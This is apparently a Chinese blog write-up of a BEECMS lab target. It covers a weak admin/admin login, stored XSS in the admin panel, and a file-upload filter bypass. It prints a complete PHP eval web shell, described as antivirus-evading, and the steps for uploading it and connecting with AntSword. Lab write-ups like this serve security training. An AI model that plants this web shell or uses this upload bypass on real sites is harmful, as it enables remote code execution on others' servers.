这几天，一天一个靶场（累鼠我啦），哈哈哈，也算是积累了不少经验，今天，我们就来讲一下BEECMS靶场吧！！！                                

先是直接进入到他的界面，可以观察到没有登录的界面，于是我们可以尝试以下在url拼接一个 /admin  , 结果成功爆出后台登录界面

http://192.168.154.152:666/admin

当当！！~~

1.弱口令(中危)

本来想着开个BP跑个字典的，但是让我没想到的是，两组admin我就进去了，嗯，一言难尽

                                               

2.存储型XSS（中危）

还是像SDCMS靶场一样，在普通的用户界面测试XSS测不出来

像这种留言板的，FUZZ过几下，手工过几下，都不行

于是这时候，我就瞄上了管理员的管理界面 （挖多了经验久有了）

构造一个XSS的POC，一试，果然成功力~~

所以啊，还是管理员的账号功能齐全，而且防范的还不严格！！挖洞还得是从管理员入手

只要你能进入后台，基本上都或多或少有一点收获

3.文件上传（高高危）

一进管理员界面，就立刻直奔文件上传的点，毕竟这个漏洞爆的金币才多呢！！

先是直接山传一张正常的图片，发现连正常的jpg，png都不给上传，更别说php

那没办法咯，那就只能上传别的格式试一下，结果发现，使用gif是能够上传成功的于是就来写木马吧（这个muma仅仅用于教育用途，禁止从事非法活动）

<?php

class father{
function get(){

    return  $_POST['cmd'];
}
}

class son extends father{
    function __construct(){

        $code=parent::get();
        @eval($code);
} 
}

new son();
?>

来解释一下这个面向对象的木马：

• 先是son这个类中，当其被创建的时候就会自动调用 __construct方法，去获得father这个类中的get方法的返回值，并且@eval去执行
• 对于父类的get方法，就是返回一个 $_POST['cmd'] 这个也是一种常见的操作啦
• 然后就是创建一个son的类，并主动调用__construct方法来实现执行一句话木马的目的

这种就是一种常见的面向对象免杀木马，不信，你可以在vscode中运行看一下你的windows defender会不会报毒                              ​​​​​​​        

然后就是上传文件了👌👌👌 修改一下content-type 再改一下木马的后缀

成功上传，并且再相应包中找到返回的路径（他的名字不再叫webshel了,但是.php后缀是不变的）

返回上以及目录，再将url拼接进去，然后就是蚁剑搜哈了

当然了，如果是真实场景还是不建议上传webshell，上传一个phpinfo就差不多了，毕竟：

                                                                      ！！ 点到为止！！

以上就是BEECMS的漏洞挖掘笔记了，我的感悟还是，打这种CMS的成就感还是比upload靶场的成就感强很多，毕竟，他和现实生活中的场景很相似吗（特别是当你挖到文件上传的时候，当时我都快跳起来了，哈哈，要是这是个真实的系统，那就赚大发了 @_#）!!!!

        ​​​​​​​        ​​​​​​​        ​​​​​​​        ​​​​​​​        ​​​​​​​        ​​​​​​​